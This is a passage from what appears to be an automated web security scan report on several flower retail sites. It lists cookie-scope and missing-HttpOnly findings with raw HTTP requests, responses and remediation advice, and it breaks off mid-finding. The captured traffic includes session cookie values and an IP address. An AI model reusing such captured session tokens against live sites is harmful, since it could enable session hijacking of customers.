The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webrec/wr.do?client=FTD&sessionId=544E1284-8127-56AF-A20F-90F1DFEB835D&ns=1&pt=h&mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3&lang=en&v=4.7.3&mbts=1304902834941&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=9D2A178B4C8160F5F1DD7DA8663002AD; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=wQ4lB1nLaBF6/m4UPcv42F1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 27-May-2079 04:14:44 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 34

<html>
<body>
</body>
</html>

12.38. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s82534269827883

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/proflodevelopment/1/H.22.1/s82534269827883?AQB=1&ndh=1&t=9%2F4%2F2011%207%3A8%3A20%201%20300&ns=proflowers1&pageName=PFC%3Ahome%3Ahome&g=http%3A%2F%2Fwww.proflowers.com%2F&cc=USD&ch=PFC%3Ahome&server=PRVD36&c1=PFC%3Ahome%3AHPC&c2=5%3A00AM&c3=Monday&v4=PFC&c5=na%3Ana%3Ana%3Ana&v5=HPC&v7=27&c11=PFC&c12=true&v12=pfb0%3Apku1%3Apkv2%3Apml0%3Apfl0%3A%3A%3Apfe3%3Apec3%3Apem1%3Apmm2%3A%3A%3A%3Appr2%3Axpa1%3Apsr2%3Aapg1%3A&c13=false&c14=true&v22=5%3A00AM&v23=Monday&c28=91621bab-4967-45f8-ad8e-98be730e6e4a&v31=-1&c35=CUS&v35=empty%20code&v39=pvo2%3A%3A%3A%3Apnp3%3Apxa2%3Apxb1%3Apxc1%3A%3A%3Apks3%3Apkt1%3Azzd2%3Azze1%3Aphl2%3Aphr2%3Azzf2%3Axpc1%3A&v49=%3A%3A%3A%3A%3Apbo5%3A%3Appv3%3A%3Anta1%3Antb1%3Antc1%3Antd2%3Ante2%3Apmt3%3A%3Axpb1%3Aprh1%3A&v50=PFC%3AUSA&v52=PFC&c53=D%3Dv53&v53=homepage001&c54=D%3Dv54&v54=pfc_control_050811&c55=D%3Dv55&v55=PFC%3Ahome%3Ahomepage%3Apfc_control_2011-05-07&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 12:08:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E3EC9C05010F51-40000101E0246B4D[CE]; Expires=Sat, 7 May 2016 12:08:24 GMT; Domain=.proflowers.com; Path=/
Location: http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883?AQB=1&pccr=true&vidn=26E3EC9C05010F51-40000101E0246B4D&&ndh=1&t=9%2F4%2F2011%207%3A8%3A20%201%20300&ns=proflowers1&pageName=PFC%3Ahome%3Ahome&g=http%3A%2F%2Fwww.proflowers.com%2F&cc=USD&ch=PFC%3Ahome&server=PRVD36&c1=PFC%3Ahome%3AHPC&c2=5%3A00AM&c3=Monday&v4=PFC&c5=na%3Ana%3Ana%3Ana&v5=HPC&v7=27&c11=PFC&c12=true&v12=pfb0%3Apku1%3Apkv2%3Apml0%3Apfl0%3A%3A%3Apfe3%3Apec3%3Apem1%3Apmm2%3A%3A%3A%3Appr2%3Axpa1%3Apsr2%3Aapg1%3A&c13=false&c14=true&v22=5%3A00AM&v23=Monday&c28=91621bab-4967-45f8-ad8e-98be730e6e4a&v31=-1&c35=CUS&v35=empty%20code&v39=pvo2%3A%3A%3A%3Apnp3%3Apxa2%3Apxb1%3Apxc1%3A%3A%3Apks3%3Apkt1%3Azzd2%3Azze1%3Aphl2%3Aphr2%3Azzf2%3Axpc1%3A&v49=%3A%3A%3A%3A%3Apbo5%3A%3Appv3%3A%3Anta1%3Antb1%3Antc1%3Antd2%3Ante2%3Apmt3%3A%3Axpb1%3Aprh1%3A&v50=PFC%3AUSA&v52=PFC&c53=D%3Dv53&v53=homepage001&c54=D%3Dv54&v54=pfc_control_050811&c55=D%3Dv55&v55=PFC%3Ahome%3Ahomepage%3Apfc_control_2011-05-07&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 12:08:24 GMT
Last-Modified: Tue, 10 May 2011 12:08:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www15
Content-Length: 0
Content-Type: text/plain


12.39. http://www.ftd.com/351

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /351

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Set-Cookie: TLTSID=B6A5C1A479D710790018F9E37C66E2B0; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=B6A5C1A479D710790018F9E37C66E2B0; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:00:21 GMT
Location: http://www.ftd.com/351/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 350
Date: Mon, 09 May 2011 01:00:21 GMT
X-Varnish: 540312318
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.ftd.com/351/">h
...[SNIP]...

13. Cookie without HttpOnly flag set
There are 57 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



13.1. http://blooms.1800flowers.com/cm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blooms.1800flowers.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?ci=90074784&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5 HTTP/1.1
Host: blooms.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 01:00:51 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: CoreID6=70061304902851067811388; path=/; expires=Fri, 08 May 2026 01:00:51 GMT
Set-Cookie: TestSess3=70061304902851067811388;path=/
Location: /cm?ci=90074784&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&cvdone=p
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


13.2. http://t.p.mybuys.com/webrec/wr.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webrec/wr.do?client=FTD&sessionId=544E1284-8127-56AF-A20F-90F1DFEB835D&ns=1&pt=h&mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3&lang=en&v=4.7.3&mbts=1304902834941&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=9D2A178B4C8160F5F1DD7DA8663002AD; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=wQ4lB1nLaBF6/m4UPcv42F1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 27-May-2079 04:14:44 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 34

<html>
<body>
</body>
</html>

13.3. http://ww30.1800baskets.com/deliverycalendarnew.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800baskets.com
Path:   /deliverycalendarnew.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /deliverycalendarnew.do?month=5&year=2011&locationType=1&itemCount=1&prodType=GPT&productPrice=29.99&zip=10010&country=&productSKU=93260&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=93260&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Origin: http://ww30.1800baskets.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903453756&t4=1304903443093&lti=1304903453755&ln=sd&hr=javascript%3AcheckNShowAppParamLightBoxCalendar%28deliveryDate%2Ctrue%29%3B&fti=&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=&fd=&uer=&fu=&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:18:13 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00001N288SgFQQcgjdh8LBTc6IT:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 52934


<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/baskets/flowers_enterprise_apr1.css"/>

<script type="text
...[SNIP]...

13.4. http://ww30.1800baskets.com/include/cookieCloner.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800baskets.com
Path:   /include/cookieCloner.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /include/cookieCloner.asp?tablink=true&redirecturl=template.do?id=template3&page=2000&persistent=847b741e4593439b8e3ed6040ba46630&shopperid=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618&brandCode=1001&banner= HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 01:15:57 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Location: http://ww30.1800baskets.com/template.do?id=template3&page=2000
Content-Length: 0
Set-Cookie: JSESSIONID=0000s_k0fIDZcMvgOtLcaDZHOiR:-1; Path=/
Set-Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; Expires=Thu, 06-May-21 01:15:56 GMT; Path=/; Domain=1800baskets.com
Set-Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; Path=/; Domain=1800baskets.com
Set-Cookie: brandCode=1001; Path=/; Domain=1800baskets.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/plain
Content-Language: en-US


13.5. http://ww30.1800baskets.com/shoppingbasket.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800baskets.com
Path:   /shoppingbasket.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=0000a4jGFqAQQsPqkpo4AlBHArV:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:18:26 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000elBrn4hw6Blclz2pBq53Rgi:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 146143


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...

13.6. http://ww30.1800baskets.com/template.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800baskets.com
Path:   /template.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /template.do?id=template3&page=2000 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Set-Cookie: JSESSIONID=0000dNGqKXu-V4E9FonaYphG7gq:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 37878


<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">


<title></title>
<meta name="description" content="ThePopco
...[SNIP]...

13.7. http://ww30.1800flowers.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:38 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: FSESSIONID=2f6aa588e33f44c3bb0191955def6935; Path=/; Domain=1800flowers.com
Set-Cookie: brandCode=1001; Path=/; Domain=1800flowers.com
Set-Cookie: ShopperManagerEnterprise=41db6fdb-b7c6-458a-b4c5-a2060d927f3c; Expires=Thu, 06-May-21 01:00:38 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63361


<html>

<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<!--MSN--><meta name="msvalidate.01" content="7372219C2822
...[SNIP]...

13.8. http://ww30.1800flowers.com/collection.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /collection.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collection.do?dataset=10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000oqktH2yyDUkrp5oGcWwUdty:-1; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.1.10.1304902847; cmTPSet=Y; CMAVID=70091303843240316067555; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902848067&t2=-1&t3=1304902867488&lti=1304902867488&ln=tab3p1_header&hr=/collection.do%3Fdataset%3D10305&fti=&fn=searchform%3A0%3Bfindgiftform%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=w-Welcome%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:04:11 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000qD3wSlEaCI6fvlpmlKhLnKM:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 73822


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta
...[SNIP]...

13.9. http://ww30.1800flowers.com/deliverycalendarnew.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /deliverycalendarnew.do

Issue detail

